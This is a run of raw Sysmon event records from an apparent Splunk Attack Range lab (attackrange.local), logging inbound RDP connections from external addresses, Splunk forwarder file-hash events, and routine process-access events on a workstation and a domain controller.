SERVICEtcpfalsefalse87.236.208.230-55993-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977307Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:30.676{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55909-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977312Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:35.895{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E189379F47468F06FA2ED3AECBE23A5,SHA256=EB2CC815AE1CBA9404B7684471D4C3046F158F8D6BF483F22BBA6308DE06B6F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048657Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:35.663{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05185F99F77ECD927F17549DAAA20A2D,SHA256=8C2E58529537233F2CA24C69F95D9D8DF7D32F740A3A0A378D56B409E6B07735,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048656Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:35.663{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7B96636198837DAEDF776602541D373E,SHA256=9E7D1129567ED613120F4A69B6D33A803B8B2C955925983B74330FA358458622,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048655Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:35.347{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9631E57657E826C308DE321A3D127FF5,SHA256=421029DBB805FD574CE6D4C76C2484415EABD9E15EF60406E6D3A2C917A0861B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977311Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:35.645{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=82B4726DDDAB12E5BBE73725BD584FA2,SHA256=ACC80B671E6888A5EACBDF5BAA96799B9B65297C850DB54345D36E81E04FF8E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977313Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:36.961{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62B4FCDC0A2067E5E00643F8F31E33D8,SHA256=3AFF5556AD6A1EB49EC5D35A4CC4279300B398CC2CE0A27E0B115F072C727E9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048660Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:36.462{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048659Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:36.362{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A6889A1BAF62DE1E98B4FC2D28C639D,SHA256=1D14A1A5F0BABF91D754116E184DC6D562DDB6DCF79DDB45963F76C9DED82369,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048658Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:34.021{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64169-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000977329Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:37.973{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99C8F5F53A5FEC9AC2B3028A6D0CE507,SHA256=908AFAD068B20B63C7995D83891609D8A41F16379D39C0B3DE3BF2EC72A93DB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048661Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:37.376{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6CD31778A26A889DBED38E89CD228E7,SHA256=0B39C380FD6862DF8E23DDBCC6E85F964E9EF08B755ADFCB7A6B5A6144835BC3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977328Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:37.755{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8925-6151-9579-00000000FD01}1984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977327Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:37.755{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977326Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:37.755{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977325Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:37.755{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977324Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:37.755{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977323Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:37.755{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977322Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:37.755{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977321Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:37.755{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977320Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:37.755{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977319Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:37.755{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977318Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:37.755{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8925-6151-9579-00000000FD01}1984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977317Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:37.755{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8925-6151-9579-00000000FD01}1984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977316Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:37.740{69CF5F33-8925-6151-9579-00000000FD01}1984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000977315Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:33.968{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-32090-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977314Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:33.759{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59295-false10.0.1.12-8000- 23542300x8000000000000000977332Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:38.989{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CA32BE9019D3CCE2A76E9E414A32587,SHA256=B89367DB0C89923DD10003C8981E8A95CDB8ACD4D7C6AFF2539623FF08E6C6E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048662Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:38.392{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B3263447E1A012BE730B4F96999E628,SHA256=43C9C772E605FF59332C9F817C8DC04948C7C126EEDCD63353B3237BE50528AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977331Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:38.458{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A2CA2759E9FBDA5B52D314678097DE9,SHA256=C18C7BD8AA1042958066EDECC53652AE97164174E6A202F3B2C6F1EBB9F836FD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977330Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:35.611{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59015-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001048666Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:39.410{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C534E44B60D90F22ABD64E10144C4EB7,SHA256=12D33345599A760DA9CB41921C5C9B5B70B4C949B73228BAF87BDC3D9CBAFF33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048665Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:39.208{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=CFA18C8B19D599E81C817620C24FCA82,SHA256=4C30E9A435366C2BD1E6A0143068F3012277F96ABAE77CBFC4A58D7FAC601A2F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048664Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:36.784{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53253-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001048663Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:36.138{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53252-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001048667Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:40.427{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F92C28201053B00B81BCE453AF450EBA,SHA256=190FBDC47B1ACBBDD9DA750D86D40B954970D8C2B79898AA908E176618D37DAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977333Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:40.005{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECC9A63914801C33D9A9AEA43AA5BABA,SHA256=7FDD4815C259C997633FB3F5BA224B5C9E0112682CAE0D787FC1BFEE7D48AE51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048669Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:41.442{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE9A13DDB07C9AEFC2E6435C3AE325B7,SHA256=C691B581A647897C0B5CA0E6CEECFD45FFF9676AD4F5309CD4BBBAE672E094C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977337Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:38.899{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59296-false10.0.1.12-8000- 354300x8000000000000000977336Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:38.812{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-1783-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977335Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:37.773{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de63037-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977334Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:41.005{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E9F2AC6124C9F1318A50897EAA44EA1,SHA256=0CF16F34CC72888D55D5E4C810BA0260F1BE4118A864822B57165F6EDCBB64F2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048668Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 